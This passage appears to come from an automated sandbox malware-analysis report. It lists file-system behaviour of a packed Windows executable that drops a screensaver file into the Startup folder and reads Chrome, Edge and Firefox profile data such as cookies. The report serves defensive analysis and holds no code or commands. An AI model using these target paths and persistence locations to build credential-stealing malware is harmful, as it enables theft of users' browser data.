              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
